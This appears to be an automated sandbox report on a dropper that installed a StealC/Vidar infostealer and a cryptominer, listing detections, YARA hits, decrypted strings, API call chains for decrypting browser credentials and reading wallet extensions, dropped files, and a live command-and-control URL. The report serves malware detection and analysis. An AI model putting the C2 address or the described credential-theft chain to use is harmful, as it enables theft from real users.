AV Detection

Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | Avira: detection malicious, Label: HEUR/AGEN.1315065
Source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.145/3cd2b41cbde8fc9c.php"}
Source: file.exe | ReversingLabs: Detection: 18%
Source: Yara match | File source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | Joe Sandbox ML: detected
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: CtIvEWInDoW
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: AgEBOxw
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: ijklmnopqrs
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: /#%33@@@
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: @@@@<@@@
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: abcdefghijklmnopqrs
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/|
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: %s\%V/yVs
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: %s\*.
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: }567y9n/S
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: ntTekeny
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: ging
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: PassMord0
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: J@@@`z`@J@@@J@@@
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: OPQRSTUVWXY
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: 456753+/---- '
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: '--- '
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: qRslaZ9Iw|
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: HeapFree
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: GetLocaleInfoA
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: ntProcessId
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: wininet.dll
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: shlwapi.dll
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: shell32.dll
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: .dll
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: column_text
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: }67b)>4`,LXZu2L6qd
Source: 17.2.syncUpd.exe.400000.0.raw.unpack | String decryptor: login:
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,14_2_0045D188
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_0045D254 ArcFourCrypt,14_2_0045D254
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_0045D23C ArcFourCrypt,14_2_0045D23C
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_10001000 ISCryptGetVersion,14_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Code function: 14_2_10001130 ArcFourCrypt,14_2_10001130
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,17_2_00409540
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,17_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,17_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,17_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,17_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_6A3B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,17_2_6A3B6C80
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Code function: 17_2_6A50A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,17_2_6A50A9A0

Bitcoin Miner

Source: Yara match | File source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Compliance

Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Unpacked PE file: 16.2.weblinkanalyzer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Unpacked PE file: 17.2.syncUpd.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Unpacked PE file: 21.2.weblinkanalyzer.exe.400000.0.unpack
Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe | Unpacked PE file: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack
Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe | Unpacked PE file: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack
Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112746972.log
Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112756158.log
Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112813759.log
Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112809817.log
Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
Source: Binary string: _assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
Source: Binary string: symbols\dll\System.Windows.Forms.pdb1 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .pdb[ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: HC:\Windows\System.Windows.Forms.pdbZ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb@+ source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: nss3.pdb source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
                        Source: Binary string: indows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: .exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00452A60 FindFirstFileA,GetLastError,14_2_00452A60
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,14_2_00474F88
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,14_2_004980A4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00464158
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00462750 FindFirstFileA,FindNextFileA,FindClose,14_2_00462750
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00463CDC
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_00408123 FindFirstFileA,FindClose,15_2_00408123
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_004085B8
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_0040342B FindFirstFileA,15_2_0040342B
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040D1C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_004015C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_00411650
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B610
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0040DB60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040D540
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00412570
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,17_2_004121F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00411B80
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: kWI9BKuDjwJM7B5NwPk2GzgD.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: yHair8bv0ERaBzH37z6LxL50.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: hi1kLmvmLjmGV9XJZsoarSnr.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Etx5NisO4KYhtbTdXifIEiTV.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: oCvcL0BwU8vcPCyx5xUoBc3Y.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Q5osSFe33QJNDi4fWnRX1Cu5.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: LDXcH6E4Iv1SvrK1qy7oaACH.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JyXCMCM3VWqxCiPqkfVD2gjF.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: IFLjUteLBPHHPHAOdnwBobA2.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: faO2uzdAaG1P228qHtBBLcZH.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: IDRlhwzDAGIqqRkTqqEJkpgx.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: d5GRgSmaPslr3qxE59r0Grrj.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: nDBv07hvNgThXuSIOCMDoi6m.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: bzkeEcACtFKnoC1UuUSbz0OB.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: EHUfUZeP6l6RDehwxBVxTksR.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: mK4pc1xdYC3P6I8kvaRZLGvq.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: elGBoM2ZtmiQCRbm3vEB3XLV.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Bm6HEFHdCdk8uoOOXBbmJVrU.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: nWcMFhZp4lePMF3ffEzam0Hv.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 7nBui7yHWFndJbxXyvMi3Z9f.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 9ufe1gHGCTbQcgch0LWJNHFl.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: QcjHEdeing2ZjhaateNUIVJK.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: X6qGra5pvE95uBRXRIElCuiP.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Za9YgbYvsobCQHROGG56LpJy.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 8T7EILlANzGG35y6DwATJf1o.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: HowZQITuQLqErBUo8GovFg55.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ynI9MlCoK2uCu7iRPFKyVbhb.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Kf7ZRC03XR3hUBUOYNNrjsG6.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: jum4cD5QgYDb9AipfhKNG4uj.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: UrMbnkRSiaiIW6eQOwnDTcSo.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: N4cHwiWoADLxP3cQz6IdXrkI.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 30eZAb709eOPYHi1pUuH6yc8.exe.8.dr
